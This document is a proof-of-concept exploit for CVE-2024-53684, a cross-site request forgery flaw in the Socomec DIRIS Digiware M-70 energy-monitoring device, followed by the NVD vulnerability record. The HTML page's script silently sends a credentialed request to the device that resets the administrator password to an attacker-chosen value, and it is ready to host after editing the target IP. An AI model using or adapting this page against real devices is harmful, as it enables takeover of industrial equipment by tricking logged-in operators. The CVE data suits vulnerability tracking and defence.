CVE-2024-53684

<!-- CVE-2024-53684 CSRF PoC for Socomec DIRIS Digiware M-70 --> <!DOCTYPE html> <html> <head> <title>DIRIS Digiware M-70 CSRF PoC</title> </head> <body> <h2>CVE-2024-53684 PoC</h2> <p>Target: Socomec DIRIS Digiware M-70</p> <script> // Target device IP (change as needed) const targetIP = "192.168.1.100"; const targetPort = "80"; // CSRF payload - Example: Change admin password const csrfPayload = { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'action=set_config&module=webview_m&param=admin_password&value=attacker_new_password' }; // Execute CSRF attack fetch(`http://${targetIP}:${targetPort}/cgi-bin/webview_m.cgi`, csrfPayload) .then(response => response.text()) .then(data => { console.log('CSRF attack sent'); document.getElementById('status').innerText = 'Attack Sent'; }) .catch(error => { console.error('Error:', error); document.getElementById('status').innerText = 'Error: ' + error; }); </script> <p id="status">Attacking...</p> </body> </html>

{"cve": {"id": "CVE-2024-53684", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:50.513", "lastModified": "2025-12-05T21:10:42.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cross-site request forgery (csrf) vulnerability exists in the WEBVIEW-M functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted HTTP request can lead to unauthorized access. An attacker can stage a malicious webpage to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:*", "matchCriteriaId": "C07608BE-E7E3-44F5-AE9A-4AE36679F58A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:*", "matchCriteriaId": "153A9D26-2C76-4B6B-AFD8-22DEB2081F34"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-2116", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.socomec.fr/sites/default/files/2025-10/CVE-2024-53684---Diris-Digiware-Mxx-Dxx-_VULNERABILITIES_2025-10-01-16-43-14_English_0.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2116", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Vendor Advisory"]}]}}